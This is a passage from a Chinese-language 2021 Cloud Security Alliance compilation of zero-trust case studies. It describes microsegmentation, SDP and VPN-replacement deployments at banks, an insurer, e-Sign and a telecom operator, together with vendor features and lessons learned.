常主机,需在网络层直接关闭、阻断。防止攻击者进入网络后在数据中心内部横
移;在上千点主机的业务规模下,当主机的业务、IP 等发生变化时,需能够实
现访问控制策略的自适应更新;需实现针对物理机、虚拟机及容器的统一管理。
2.攻击面缩减。
数据中心内部存在大量无用的端口开放,存在较大风险。
3.发现低访问量虚机。
目前数据中心内部存在有些虚拟机访问量较少,使用频率不高的情况,这造
成了资源浪费,并且可能成为僵尸主机,增加安全风险。
4.内部异常流量发现。
目前数据中心内部缺少对于内部东西向流量的监测能力,内部存在不合规的
访问行为。
©2021 云安全联盟大中华区-版权所有
65
5.简化安全运维工作。
目前数据中心内部由于历史原因及人员的更迭,现有很多规则已与需求不符,
但由于不清楚业务访问逻辑,安全策略调整十分困难,需要能够减少安全策略总
数,并对策略调整提供依据。
6.投资有效性需求。
目前数据中心内部采用传统物理服务器,虚拟化云平台也在持续建设中(按
照规划,云平台将发展为混合云架构),以及不排除未来会采用容器技术进行业
务搭建。考虑到投资的有效性,具体要求如下:
1)既适用于物理机、也适用于不同技术架构的云平台。
2)可以对容器之间的流量进行识别和控制。
3)物理机、不同技术架构的虚拟机、容器均可在同一平台进行可视化呈现
及安全管理。
7.协助满足等保 2.0 的要求。
等保新规中“能够识别、监控虚拟机之间,虚拟机与物理机之间的流量”等
要求。
12.3.2.2 功能分析
1.内部流量可视化
1)需要在一个界面中绘制全网业务流量拓扑,并能实时更新访问情况;
2)需识别物理机之间、虚拟机之间、虚拟机与物理机之间的流量;
3)需识别流量的来源 IP、目的 IP、访问端口即服务;
4)需能够查看虚拟机所开放的服务、服务所监听的端口,及服务对应的进
程;
5)需能够记录服务及端口的被访问次数;
6)需能够记录被阻断的访问,包括来源 IP、访问的服务及端口、被阻断的
次数等信息;
7)拓扑图需可以标识出不符合访问控制策略的访问流量;
8)拓扑图中的元素需支持拖动、分层,实现业务逻辑的梳理。
2.对未来可能涉及到的容器环境提供微隔离防护能力
©2021 云安全联盟大中华区-版权所有
66
1)需能够识别容器之间的访问流量;
2)需识别流量的来源 IP、目的 IP、访问端口及服务;
3)需能够实现容器之间的访问控制。
3.微隔离策略管理
1)需实现全网物理机、虚拟机、容器的访问控制策略统一管理;
2)通过 web 页面需实现访问控制策略的增加、删除、调整;
3)需可以进行精细化访问控制策略的设置,包括访问的来源、目的、访问
的端口及服务;
4)需可配置逻辑业务组的组内规则及组间规则。
4.访问控制策略自适应调整
1)当物理机、虚拟机、容器的 IP 发生变化时,产品需能够自动调整所有与
其相关主机的访问控制策略;
2)在虚拟机迁移的过程中访问控制策略需能随之迁移;
3)当虚拟机发生复制时,系统能需识别并自动将原虚拟机的角色及访问控
制策略应用到新复制的虚拟机上;
4)产品需能够自动发现新建虚拟机,并自动匹配预设访问控制策略。
5.兼容性要求
1)需支持 Windows sever2008R2 和以上 Windows 全系 64 位服务器操作系统,
及 CentOS、Ubuntu、Redhat 等主流 Linux 发行版本;
2)需支持实体服务器、VPS 和云主机等混合环境;
3)需支持 OpenStack 等云操作平台,Xen、Hyper-V、VMware、KVM 等虚拟
化架构。
6.产品安装
1)客户端支持一键快速安装,可利用统一运维工具,一键批量安装;
2)客户端的安装、升级、删除无需重启虚拟机。
12.4 经验总结
实施过程中的挑战:客户要求虚拟机模板内置客户端镜像形式部署,由于部
署时间紧张且需要对不同的虚拟机内的文件进行修改,故没有采取此安装方式。
©2021 云安全联盟大中华区-版权所有
67
13、缔盟云中国建设银行零信任落地案例
13.1 方案背景
建设银行高层领导提出了数字经济时代,要破现代商业银行的两大困:1.
“数据之困”,拥有数据很重要,但更重要的是将数据充分“聚起来”“用起来”
“活起来”,这样才能使数据成为基础性战略资源和重要生产要素。2.“安全之
困”,防范现代科技带来的数据泄露、违规经营、服务中断甚至系统崩溃等风险。
建设银行作为大型商业银行数字化转型的代表,近年来,一直在产品创新、
新技术应用、业务流程变革、开放银行建设以及监管体系等方面大力推进数字化
发展。基于对缔盟云领先产品性能及创新能力的认可,建设银行终端数据安全防
泄露项目选定缔盟云“太极界”零信任安全产品为金融数据的安全高效流通保驾
护航。
13.2 方案概述和应用场景
零信任网络访问产品“太极界”被规模化应用到建行及其全球分支机构,服
务数十万终端。
图 1 太极界技术架构示意
©2021 云安全联盟大中华区-版权所有
68
以零信任客户端、零信任分布式网关、零信任控制器为主要组件,构建终端
-互联网-云的弹性安全区域。由缔盟云 ESZ®Cloudaemon 平台出品。
图 2 一图看懂太极界如何防止金融企业源代码泄露
图 3 一图看懂太极界远程办公接入
©2021 云安全联盟大中华区-版权所有
69
图 4
13.3 优势特点和应用价值
1.连接、开放、敏捷的数据流通---太极界破”数据”之困
用好、用活外部公共信息和内部经营数据是数字经济时代对金融行业的全新
要求。但由于对网络安全极高标准的要求,商业银行在进行互联网数据、办公网
数据以及更高安全级别数据的跨网络传输时需要经过冗长的审批流程,并需要通
过专用加密设备进行中转。这极大地限制了数据流通性和办公运营效率。
太极界在终端建立一个安全可信的工作空间,在此空间内,被授权的员工可
以实现在办公环境、互联网环境以及更高密级别的环境之间自由切换,访问已授
权的内部信息及外部资源,真正发挥数字经济的连接、开放、便捷等特征。同时
管理平台可以对员工在终端的操作行为进行监管和控制,杜绝非法泄露。
2.灵活、无缝、安全的员工访问---太极界破“安全”之困
新冠疫情的持续蔓延,让商业银行面临前所未有的挑战,金融业务的移动化、
线上化和电子化亟待全面推进。员工远程接入办公、非管控设备临时访问、互联
网接入开发环境、敏感数据授权提取等常见场景无形中扩大了不可信身份接入的
风险以及来自外部攻击者的攻击面。
太极界通过零信任网络对用户、设备、应用、报文进行持续验证,确保访问
的安全可信,同时让整个数字生态系统在互联网上隐藏,从而降低被攻击的风险。
最终帮助商业银行实现各类设备都能随时随地访问业务系统、服务、数据等,实
现灵活、无缝、安全的访问体验。
©2021 云安全联盟大中华区-版权所有
70
14、联软科技光大银行零信任远程办公实践
14.1 方案背景
疫情前光大银行主要使用 VPN 进行远程办公,VPN 设备在开发网、测试网、
办公网均有部署。去年疫情期间,远程办公常态化,运维部门的工作强度增大,
而 VPN 也频频暴露出来漏洞,增加了远程接入的风险。并且在参加护网行动中,
由于 VPN 带来的风险,一般会直接关停 VPN,而野蛮关停 VPN 影响业务的正常运
行。光大银行近年来高度重视网络安全建设,为了增强网络安全体系安全性与先
进性,决定使用联软 UniSDP 零信任远程办公解决方案替换现有 VPN 接入方式。
14.2 方案概述和应用场景
14.2.1 方案概述
联软 UniSDP 零信任远程办公解决方案为企业应用提供安全、高效、面向未
来的企业安全架构平台。基于零信任安全理念设计,践行零信任网络访问核心原
则,包含控制器、安全网关、客户端三大核心组件,采用控制平面与数据平面分
离架构,在用户访问受保护资源之前,通过 SPA 单包授权机制与多种身份认证手
段,先进行身份校验,确保身份合法后才可与安全网关建立加密连接,并赋予最
小访问权限;提供统一安全策略配置及下发,基于评分机制,从环境、行为、威
胁三大维度对业务访问生命周期进行动态访问控制及持续信任评估;向管理员提
供审计日志、系统监测信息、可视化管理视图,可对系统进行可视化统一运维。
光大银行实际落地方案采用了三套联软科技 UniSDP 系统分别在开发网、测
试网、办公网采用负载均衡模式部署,包括 6 台 SDP 控制管理平台和 8 台 SDP
服务网关。
©2021 云安全联盟大中华区-版权所有
71
图 1 光大银行部署架构图
在两个数据中心分别部署 3 台硬件设备,1 台管理平台(controler、mysql、
redis 一体机)和 2 台网关设备;DMZ 区的两个网关通过行方负载均衡进行服务
负载,同时两个数据中心的管理平台与各自的网关绑定,通过负载均衡对管理平
台进行健康检查,当发现某一数据中心管理平台服务异常,负载均衡会将对外的
服务完整切换至另一个数据中心的网关和管理平台,保证系统的高可用性;两个
数据中心的 MySQL 和 Redis 分别建立集群,实现数据的同步。
具体建设内容:
1.联软 UniSDP 软件定义边界系统采用转控分离的部署架构将控制层面与隧
道转发分离,提升架构安全性;
2 通过 SPA 单包授权机制,实现互联网暴露端口隐藏,屏蔽非法用户接入,
阻止网络攻击;
3.采用多因素认证方式,对接入用户的身份唯一性进行可信校验,确保仅有
合法用户允许接入访问
4.通过终端安全检查基线,实现接入终端合规性检测;
5.通过应用水印和现有 VDI,实现数据落地安全。
通过以上能力,建立以认证和授权为核心的零信任远程安全接入系统。通过
部署联软 UniSDP 软件定义边界系统,客户使用 SDP+VDI 方案,联软科技 UniSDP
©2021 云安全联盟大中华区-版权所有
72
软件定义边界系统通过可信身份、可信终端、可信网络、可信服务四个方面为此
银行了基于零信任的打造新一代远程解决解决方案。
14.2.2 应用场景
1.远程办公
替换传统 VPN,采用控制平面与网关分离部署架构,提升架构安全性。
2.单点登入
认证通过访问一个平台,可自由访问所有可访问业务系统,提升用户使用的
便捷性。
3.终端安全基线检查
持续、动态的设备验证,实现接入终端合规性检测,确保客户端接入期间的
合规性和安全性。
4.数据防护
采用 SDP 与原有 VDI 结合方式访问内网业务系统,身份校验通过后,使用
VDI 实现数据不落地,结合数字水印,实现对屏幕数据的保护及溯源。
14.3 优势特点和应用价值
14.3.1 优势特点
1.多因素身份认证
多因素(用户口令+短信口令+设备硬件特征码),提升安全强度。
2.细粒度访问控制
基于用户、设备、应用、等细粒度访问控制,实现最小权限管理。
3.业务安全保护
所有终端通过加密通道访问业务,对所有流量进行访问控制,未经认证用户
不可视,减少业务攻击面。
4.安全与业务融合
用户只需要访问一个门户,可以自由访问所有可访问系统,最大限度的保证
了用户接入体验效果。
©2021 云安全联盟大中华区-版权所有
73
5.适应弹性网络
以用户为中心重构信任体系,用户可灵活在任意位置接入,使用 BYOD、办
公等终端访问。
6.简化 IT 运维流程
适应移动办公、远程运维、移动业务办理等业务场景,助力企业数字化转型,
简化身份部署,提供业务部署、迁移的灵活性。
14.3.2 应用价值
安全:
1.SPA 机制隐藏服务,暴露面收敛,天然抗攻击
2.应用级加密隧道技术,避免内网全面暴露,并保障数据传输安全
3.多因素身份认证机制,确保用户身份合法性及唯一性
4.终端接入安全检查,保障接入设备安全合规,避免接入设备成为攻击跳板
高效易用:
5.提供灵活、便捷的多因素认证方式
6.支持 SSO 单点登录,无需反复认证
7.统一门户,统一访问入口,规范用户访问行为
8.部署简单、运维简单
9.用户行为记录分析,提供丰富的决策依据
扩展:
10.微服务架构,按需灵活扩展模块
11.标准 API 接口,轻松集成第三方系统
12.统一后台架构,支持扩展移动平台接入
14.4 经验总结
联软 UniSDP 系统是零信任安全架构的完美落地,为客户提供了高安全、易
用的远程办公解决方案,用户在建设过程首先要立足规划,注重落地,逐步替换,
在替换 VPN 的过程中要紧密和业务部门沟通,保障业务运行的连续性。
©2021 云安全联盟大中华区-版权所有
74
15、云深互联阳光保险集团养老与不动产中
心零信任落地案例
15.1 方案背景
阳光保险于 2005 年 7 月成立,历经十余年的发展,已成为中国金融业的新
锐力量。公司成立 5 年便跻身中国 500 强企业、中国服务业 100 强企业。集团目
前拥有财产保险、人寿保险、信用保证保险、资产管理、医疗健康等多家专业子
公司,国内前十大保险公司。
阳光保险自成立以来,累计承担社会风险 1290 万亿元,开启“四五”发展
新征程之际,阳光保险启动了“一聚三强”的发展新战略,即以阳光文化为引领,
以价值发展为主线,聚焦保险主业核心能力及核心优势提升,持续强化大健康产
业布局,强化大资管战略落地,强化科技引领和创新驱动,有效推动集团的高质
量可持续发展。
面向未来大健康战略挑战,集团养老与不动产中心,立足康养业务云化、智
能化的发展需求,亟需新一代安全理念的解决方案支持未来数字化建设过程的安
全建设。经多方评估与技术论证,优先选择基于零信任(ZTNA)理念,打造基于
新一代 SDP 的云网一体化平台,实现企业内网、公有云、SaaS 方式的系统安全
域防护域管理的需求:
1.解决错综复杂云+网环境下的信息安全防护
2.互联网暴露面收敛:暴露在互联网上的明源 ERP、康养运营平台、康养智
联云平台、商业租赁系统等企业应用访问通道安全
3.数据安全: 业务系统一直有端口暴露,存在 IT 资产暴露,被扫描、探测
的风险。
©2021 云安全联盟大中华区-版权所有
75
15.2 方案概述和应用场景
15.2.1 深云 SDP 解决方案
深云 SDP 整体解决方案如下
图 1 深云 SDP 整体解决方案
15.2.2 深云 SDP 方案说明
1.深云 SDP 方案支持通过客户端跟浏览器【无端】接入云端的 SDP 网关,然
后通过网关访问企业内部应用及企业私有云服务器,打造云网一体化部署。
注:浏览器访问仅支持访问 B-S 应用
2.在 SDP 大脑配置私有 DNS,加速了 DNS 解析,防止 DNS 劫持,默认所有云
端网关所有的端口都是 Deny,只有云深客户端(带身份认证、数字签名)进行 SPA
端口敲门,网关验证身份后,才会针对合法用户的 IP 暂时放行 tcp 端口,保证
了企业数据“隐身”于互联网,避免端口暴露,防止被攻击。
3.用户认证通过后会建议 https 加密隧道,保障数据传输安全,进行应用的
访问。这里的应用需要在大脑提前配置,只有在白名单的应用才可以被访问
4.无端模式,深云浏览器强大的兼容模式支持企业使用统一入口登录,减少
运维成本,且通过单点登录,一次登录后可以访问被授权的所有应用,在安全基
础上实现快速办公。
©2021 云安全联盟大中华区-版权所有
76
15.2.3 阳光保险应用场景
1.场景一、浏览器登录入口—统一门户(单点登录及待办集成)
图 2
阳光保险采用融合版深云浏览器进行无端访问,既可以统一入口快速访问,
又可以保证客户端安全。
2.场景二、应用级访问准入:只允许用户访问业务系统,不暴露其他内网资
源,避免将风险引入内网
图 3
©2021 云安全联盟大中华区-版权所有
77
15.3 优势特点和应用价值
15.3.1 产品优势
阳光保险集团主要采用了深云的融合版浏览器+SaaS 模式接入深云 SDP 网关,
进行统一认证、远程安全访问、数据隐身技术及最小粒度应用授权来保障企业数
据在互联网上高效安全地交互。
图 4
15.3.2 应用价值
整体安全风险降低、办公效率提升、数据可视化、认证系统等级提升、网络
访问安全级别提升。
图 5
©2021 云安全联盟大中华区-版权所有
78
15.4 经验总结
在项目实施过程中,涉及到公司标准的 SaaS 解决方案与客户定制需求的一
些冲突,公司项目初期,未能及时考虑到客户的定制场景导致了项目验收过程中
的一些问题。
为了解决这些问题,深云 SDP 不仅支持 SaaS 接入,也可以提供 SDK 集成以
及融合版浏览器等解决了客户的定制性的需求。未来,我们更多的会通过 SDP
大脑配置来兼容或者解决部分客户定制的需求。提高客户交付及验收效率,加快
深云 SDP 产品的落地。
16、上海云盾贵州白山云科技股份有限公司
应用可信访问
16.1 方案背景
16.1.1 方案背景
随着云计算、大数据、物联网、移动互联网等技术的兴起,适用于不同行业
的“私有云”或者“公有云”解决方案层出不穷,很多政务系统、OA 系统、重
要业务系统以及其他对外信息发布系统逐渐向“云”端迁移。这无疑加快了很多
企业的战略转型升级,企业的业务架构和网络环境也随之发生了重大的变化。
目前,绝大多数企业都还是采用传统的网络分区和隔离的安全模型,用边界
防护设备划分出企业内网和外网,并以此构建企业安全体系。在传统的安全体系
下,内网用户默认享有较高的网络权限,而外网用户如异地办公员工、分支机构
接入企业内网都需要通过 VPN。不可否认传统的网络安全架构在过去发挥了积极
的作用,但是在高级网络攻击肆虐、内部恶意事件频发的今天,传统基于边界防
护的网络安全架构很难适应新环境,对于一些高级持续性威胁攻击无法有效防御,
内网安全事故也频频发生。传统安全架构已不能满足企业的数字化转型需求,传
©2021 云安全联盟大中华区-版权所有
79
统的网络安全架构需要迭代升级。
16.1.2 风险分析
16.1.2.1 过度信任防火墙
防火墙提供了划分网络边界、隔离阻断边界之间的流量的一种方式,通过防
火墙可以提供简单、快速有效的隔离能力。然而传统防火墙是基于 IP、VLAN 手
工配置访问策略,这意味着管理员需要将所有的防火墙策略进行持续维护,不但
工作量巨大容易出错,而且基于区域隔离的 ACL 授权太严格,限制了生产力。一
旦攻击者使用合法权限(如口令、访问票据等)绕过防护机制,则内网安全防护
形同虚设。
16.1.2.2 内网粗颗粒度的隔离
我们知道风险已不只来自于企业外部,甚至更多是来自于内部。而传统的基
于网络位置的信任体系,所有策略都是针对边界之外的威胁,在网络内部没有安
全控制点,导致边界一旦被攻破之后,既无法应对攻击者在企业内部的横移,也
无法有效控制“合法用户”造成的内部威胁。
16.1.2.3 远程办公背后的挑战
近年来 APT 攻击、勒索病毒、窃密事件、漏洞攻击层出不穷,日趋泛滥,云
化和虚拟化的发展,移动办公、远程访问、云服务形式又突破了企业的物理网络
边界,而接入网络的人员、设备、系统的多样性呈指数型增加,参差不齐的终端
接入设备和系统,具有极大的不确定性,各种接入人员的身份和权限管理混乱,
更使安全战场不断扩大,信任区域日趋复杂。企业同时面临着安全与效率的双重
挑战,边界消失已经成为必然。
16.1.2.4 攻击面暴露
随着公有云市场占有率不断提升、企业上云是共同的趋势。在这一趋势下,
企业的关键业务会越来越多地部署在公有云上,那么其暴露面和攻击面势必变大,
©2021 云安全联盟大中华区-版权所有
80
原本只能在内网访问的高敏感度的业务系统不得不对互联网开放。与此同时军工
级攻击工具的平民化,又让风险不断加剧。
16.2 方案概述和应用场景
16.2.1 平台架构
YUNDUN-应用可信访问解决方案提供零信架构中“无边界可信访问”的核心
能力。基于“从不信任、始终校验”的架构,重构企业安全能力建设,将过去的
基于网络边界的模型,转变为以身份为核心的新的安全边界,助力企业数字化转
型。
图 1
16.2.2 应用场景
16.2.2.1 无边界移动办公场景
据第三方调查数据显示,2020 年春节期间,中国有超过 3 亿人远程办公,
以前只能在办公室开展的工作全部搬回了员工的家中,不仅仅局限在日常工作协
同沟通、视频会议等,越来越多的企业将很多 IT 功能都搬上了远程办公平台,
远程开发,远程运维,远程客服,远程教学等等都已变成现实。为了支撑远程移
动办公,原本只能在内网访问的高敏感度的业务系统不得不对互联网开放。目前
远程移动办公使用最多的是两种接入方式,一种是通过端口映射将业务系统直接
©2021 云安全联盟大中华区-版权所有
81
开放公网访问;一种是使用 VPN 打通远程网络通道。无论哪种方式,都是对原本
脆弱的网络边界打上了更多的“洞”,敏锐的攻击者一定不会放过这些暴露面。
在 YUNDUN 零信任解决方案中,默认网络无边界,无论访问人员在哪里,使
用什么终端设备,访问是内网办公应用或是业务资源,都无需使用 VPN,同时支
持细粒度的鉴权访问控制,真正实现无边界化安全办公场景。
16.2.2.2 多云业务安全管控场景
越来越多的企业业务应用构建在云端大数据平台中,使得云端平台存储了大
量的高价值数据资源。业务和数据的集中造成了目标的集中和风险的集中,这自
然成为黑产最主要的攻击和窃取目标。从企业数字化转型和 IT 环境的演变来看,
云计算、移动互联的快速发展导致传统内外网边界模糊,企业无法基于传统的物
理边界构筑安全基础设施,基于网络边界的信任模型被打破,企业的安全边界正
在消失。
同时近年来外部攻击的规模、手段、目标等都在演化,有组织的、攻击武器
化、以数据及业务为攻击目标的高级持续攻击屡见不鲜,且总是能找到各种漏洞
突破企业的边界并横向移动,可以说企业的网络安全边界原本就已经很脆弱,而
随着“全云化”的覆盖可以说是让这种脆弱性雪上加霜。
YUNDUN-应用可信访问解决方案利用边缘安全网关技术隐藏用户的真实业务
资产,如真实 IP、端口等等,用户在通过边缘安全网关访问业务时,会进行身
份认证,只有经过身份认证并授权访问的应用才被准许访问,这样就极大的隐藏
了攻击暴露面。保障业务部署于任何环境下的访问安全性,有效防御数据泄露、
DDoS 攻击、APT 攻击等安全威胁。
16.2.2.3 统一身份、业务管理场景
单点登录要解决的就是,用户只需要登录一次就可以访问所有相互信任的应
用系统,目前,YUNDUN-应用可信访问解决方案已经支持与第三方身份认证如钉
钉、企业微信、微信等集成,同时支持标准的 OIDC、SAML 等协议,可与客户应
用轻松集成。云端控制台可进行精细的权限管控,保障权限最小化,访问控制策
略可实时下发至边缘安全网关。边缘安全网关可持续对用户的访问行为进行信任
©2021 云安全联盟大中华区-版权所有
82
评估,动态控制和调整用户访问权限。同时企业的应用将收敛于应用门户,统一
工作入口,方便统一管理。
16.3 优势特点和应用价值
16.3.1 方案优势
16.3.1.1 SaaS 部署
无需机房、服务器等开销,降低建设、维护硬件成本,使用浏览器就可以连
接到平台中,省时省力。
16.3.1.2 综合的解决方案及产品
YUNDUN-应用可信访问解决方案除了提供单独的应用可信访问功能,同时支
持灵活扩展,包含云 WAF、云抗 D、云加速、DNS 防护等综合安全能力,全面提
高应用性能和可靠性。
16.3.1.3 安全检测分析平台联动
传统的边界防护模型通常不介入到业务中,因此难以还原所有的轨迹,不能
有效关联分析,导致安全检测容易出现盲点,应用可信访问平台支持针对所有访
问审计,UEBA 异常行为分析弱身份凭据泄漏,同时支持与 SOC/SIEM/Snort 等平
台数据对接、联动分析、持续审计访问。
16.3.2 客户价值
16.3.2.1 传统 VPN 的缺陷
1.安全性不足
仅一次用户鉴权,没有持续安全监测,当出现用户证书被盗或用户身份验证
强度不足的情况,无法解决合法用户的内部安全威胁;
2.稳定性不足
©2021 云安全联盟大中华区-版权所有
83
当使用弱网络(如小运营商,丢包率高),海外网络(跨洋线路,延迟大)
时,频繁断线重连,访问体验差;
3.灵活性不足
大部分企业的 VPN 产品是第三方采购,采购和部署周期长,容量,带宽也受
限于先前的规划,难以在突发需要的时候进行快速的弹性扩容。
整个方案目标旨在为用户提供更多场景的远程访问服务,内网应用快速
SaaS 化访问,灵活性更强,同时拥有更强的身份认证和细粒度访问控制能力,
弥补了内部 VPN 安全性、稳定性、灵活性不足的问题。
16.3.2.2 提高安全 ROI,降低 IT 复杂度
整体方案基于零信任思想:“默认情况下不信任网络内部和外部的任何人/
设备/系统,以身份为中心进行访问控制,身份是安全的绝对核心”。将过去的基
于网络边界的模型,转变为以身份为核心的新的安全边界,无需做过多的改造,
降低 IT 复杂度。
16.3.2.3 精细灵活的安全管理
管理员可对用户访问进行精细化控制,包括 URL 过滤、带宽控制、DNS 过滤,
优先保证组织内重要商务应用的访问,提升企业办公效率,并可视化所有网络流
量,提供各维度统计报表,帮助管理员更好地实施合规策略。
16.4 经验总结
产品是基于零信任这个概念,是国内最近才火起来的,客户接受度不高,市
场缺乏教育,以产品方式去推动时,客户更多的是处于观望和了解状态。
©2021 云安全联盟大中华区-版权所有
84
17、天谷信息 e 签宝零信任实践案例
17.1 方案背景
随着数字化的普及移动办公和云服务使用日益广泛,企业或政府内部薄弱系
统无防护,网络边界不再局限于个人设备和系统的运行环境。企业内部应用存在
多而分散,登录认证不统一,员工的账号的恶意行为很难被分析,部分员工使用
自己的设备在公司办公等多种问题,内部网络不再是应用可以无防护开放的安全
环境。对于缺乏安全防御管理的应用,天谷零信任平台对访问的来源设备、用户
登录凭证等进行细粒度的访问控制,基于多重因素的持续认证可以大幅度减少应
用被扫描,爆破,内部资料外传等风险。e 签宝作为 saas 公司存在其场景的特
殊性,主要包含以下:
1.采用多云服务,云服务账号管理比较痛苦,无法接入内部用户体系,风险
极大
2.内部应用域名混乱,缺乏统一登录,业务不愿意适配接入统一认证
3.第三方应用如 wiki,jira,Jenkins 等无人维护,无法二开,更无法接入
统一登录平台
4.外采 saas 账号无法接入内部用户体系,风险极大
©2021 云安全联盟大中华区-版权所有
85
17.2 方案概述和应用场景
图 1
在天谷零信任平台的设计中,用户必须通过零信任网关才能访问到后台的应
用系统,同时集成风险引擎、信用评级、安全态势等安全能力,打造基于基于身
份体系的安全管控平台。
天谷零信任平台包含如下的组件:
1.零信任网关
零信任网关作为代理,用户必须通过零信任网关才能访问到后台的应用系统,
后台业务做隐身保护,同时提供精细粒度的、基于请求的策略防护,非法访问敏
感信息的审计日志,打通 RBAC 鉴权网关
2.DNS 指向
打通内部 cmdb,DNS 服务,把业务域名切到零信任网关
3.IAM
IAM 的统一卡点,实现所有应用登录环节中身份体系的统一身份收拢
4.RBAC 权限控制模型
实现了应用访问的应用级权限访问控制,基于用户部门岗位等,进行权限的
全生命周期管理
5.UEBA 统一审计
©2021 云安全联盟大中华区-版权所有
86
实现了用户跨应用的统一行为审计,针对用户的历史访问行为进行画像,并
且将当前用户的行为进行匹配,UEBA 基于 LSTM,多采用层次检测和集成检测两
种思路,层次检测指的是搭建多个简单模型对全量数据进行粗筛,之后在用性价
比高、可解释性好的模型进行精准检测
6.文件追踪
网关对于所有系统的文件下载行为,对其中的敏感文件进行统一管控到文件
管理平台,并在下载前添加下载人的身份追踪标识,来追踪这份敏感文件的打开
记录目前阶段,零信任网关已经接入公司内部绝大多数部分系统,包括但不限于
基于开源搭建、自研、三方私有云部署、三方 Saas 服务部署等
17.3 优势特点和应用价值
1.e 签宝零信任团队只有 2 个同学,应用无需任何改造,只要域名切换到网
关,进行部分简单配置,就能接入,用户使用除登录界面变化外,基本无感。方
便快捷的接入方式 使得天谷零信任平台已经接入 30+以上的内部系统,全面实
现公司的统一登录以及身份认证,堵住数据泄露的缺口,抓住公司内鬼。
2.突出优势是能够为所有应用插件化赋能,比如统一添加文件追踪能力,对
于数据流的导出,可以进行全生命周期的追踪。
3.天谷零信任平台通过系统化,确保零信任能够在总部以及全国各分办进行
扩展, 过程不会对系统使用、技术支持或用户使用造成负面影响。
4.零信任结合 UEBA 将保护资源的目标聚焦到人与数据安全,通过策略与控
制排除不需要访问资源的用户、设备与应用,使得恶意行为受到限制,缩小被攻
击面,大大降低了安全事件的数量,能够节约时间与人力资源来迅速恢复少数的
安全事件。
©2021 云安全联盟大中华区-版权所有
87
图 2
图 3
17.4 经验总结
零信任系统看着很美好,其实坑超级多,下面罗列几点遇到的坑:
1.跨域问题
零信任由于是劫持域名,域名不统一就会存在跨域问题,要做到单点登录,
就需要解决跨域问题,这块我们投入大量时间去解决,我们现在正在推内部应用
统一域名
2.跳转问题
零信任要判断登录状态,做到实时拦截,拦截后重定向到登录页,由于现在
大部分业务都是前后端分离,但部分老业务又没有做到前后端分离,导致跳转方
式各种各样,有的是前端跳转,有的是 302 跳转,有的是业务后端跳转,需要零
信任网关做大量适配。
©2021 云安全联盟大中华区-版权所有
88
3.对接麻烦
由于每个系统都有自己的登录认证体系,有些是遵守标准接口,但是现实很
骨感,大部分应用不遵守标准,这样零信任需要对接每个认证协议,才能实现单
点登录,比如分享逍客,FINDBI 等等
4.验证麻烦
我们采用的零信任架构是劫持域名,这样的话,会造成测试比较麻烦,上线
虽然也有灰度,但是如果有些应用是写死后端 IP 的话,这种问题根本测试不出
来,由于这种模式,造成了各式各样的线上故障
5.https 流量
我们零信任采用的 nginx 反向代理模式,拿不到 https 就麻烦进行流量解
析,这块要么申请二级域名,找供应商要证书,要么就是采用正向代理,需要客
户信任证书
6.团队协作
零信任需要切域名,业务接入等,依靠各个支撑部门的配合,安全部门、运
维部门、内部用户中心、IT 部门、行政部门以及人事部门等部门的合作,这块
存在巨大的沟通和协作成本
18、北京芯盾时代电信运营商零信任业务安
全解决方案落地项目
18.1 方案背景
随着 5G、人工智能、云计算和移动互联网等技术的发展,企业不断深化信
息化建设,云应用、移动办公等越来越普及,关键业务越来越多地依托于互联网
开展,移动成为设备、业务和人员的显著特点,企业 IT 架构进入无边界时代。
任意人员在任意时间,可以通过任意设备,在任意位置对企业内部任意应用进行
访问。给企业管理、企业安全、员工使用都带来了巨大的挑战。
根据 NIST 零信任架构白皮书的相关说明,完整的零信任解决方案将包括增
©2021 云安全联盟大中华区-版权所有
89
强身份治理、逻辑微隔离、基于网络的隔离等三部分。埃森哲《2019 年网络犯
罪成本研究报告》中显示,通过对上百家企业采访和统计得出,排在首位的安全
威胁是来源于粗心和不知情的雇员,其次是过期的安全访问控制策略,第三是未
经授权的访问。
可以看出,安全风险较大的场景都与数字世界中“人”相关,安全体系架构
从“网络中心化”向”身份中心化”转变将成为必然,本质诉求是围绕数字世界
中的“人”为中心进行访问控制,在不可信的网络环境中,基于风险进行认证、
授权访问和控制管理,从而重构可信且安全的网络框架,满足当下网络的安全需
求,降低乃至消除因网络环境开放、用户角色复杂引发的各种身份安全风险、设
备安全风险和行为安全风险。
具体安全风险如下:
1. 员工账户
员工需要记住多个应用系统的密码,在登录每个应用系统时都需要输入用户
名和口令;简单密码容易被破解,复杂密码难以记忆,如果在多个应用系统中使
用一套密码,会带来更大的安全隐患。
2. 系统管理员
因为用户的账号和权限在各应用系统中是分散独立的,系统管理员需要在每
个系统中进行创建、维护、注销以及用户管理和权限管理等一系列操作,这些工
作繁琐并容易出现纰漏,更重要的是各应用系统审计功能独立,管理员很难通过
分散的日志系统识别全局性的安全风险。
3. 业务发展
随着业务的发展,越来越多的新应用或新系统需要接入,而业务应用开发商
的开发重点在业务功能实现,对于业务安全部分往往考虑较少,存在诸多安全风
险和漏洞,所以业务方考虑到安全原因不愿草率上线,即使上线,一旦漏洞被人
利用,损失很大,这造成业务系统上线周期和风险不可控,影响了业务发展。
4. 业务风险
随着企业信息化建设的不断发展,企业中几乎所有数据均通过电子信息的方
式传播、利用和处理,并在这一过程中不断累积。在这些信息中,既有业务系统
收集到的用户信息,也有组织内部的敏感商业数据,如:财务报表,招投标方案,
©2021 云安全联盟大中华区-版权所有
90
采购计划,业务战略规划等。由于重要信息固有的商业价值和经济价值,总会被
不法份子采取各种手段所谋求如盗取账号,冒名进入业务系统,甚至直接与组织
内部人员里应外合,或内部人员监守自盗,团伙作案,最终损害组织利益或公众
利益。企业需要对用户的操作行为进行实时监控和分析,并快速识别安全风险。
作为国内领先的零信任业务安全厂商,芯盾时代拥有强大的研发团队和敏捷
的技术创新能力,并积累了大量黑灰产相关行业的对抗经验,这是领跑零信任业
务安全领域的有力保障。芯盾时代零信任业务安全解决方案,覆盖人与业务交互
全流程,自登录开始直至登出全过程进行持续的判断和风险评估,并具备对不同
风险结果的及时处置能力,帮助企业解决来自外部业务风险和内部身份欺诈,为
用户构建智能、自适应的业务安全保障体系和基础设施,避免因黑灰产和恶意网
络攻击造成的企业高额经济损失。目前,芯盾时代零信任业务安全解决方案已经
在近 1000 家金融、政府、运营商、大型企业、互联网等行业用户落地实践。
18.2 方案概述和应用场景
芯盾时代零信任业务安全解决方案,以保护企业资源安全为目标,通过保护
数字世界中“人”的安全,实现保护企业核心信息资产和金融资产的安全目标。
零信任的核心是基于身份的信任链条,芯盾时代零信任安全体系核心功能包括:
企业身份管理平台(EnIAM)和零信任业务安全平台(SDP)等。实现身份/设备
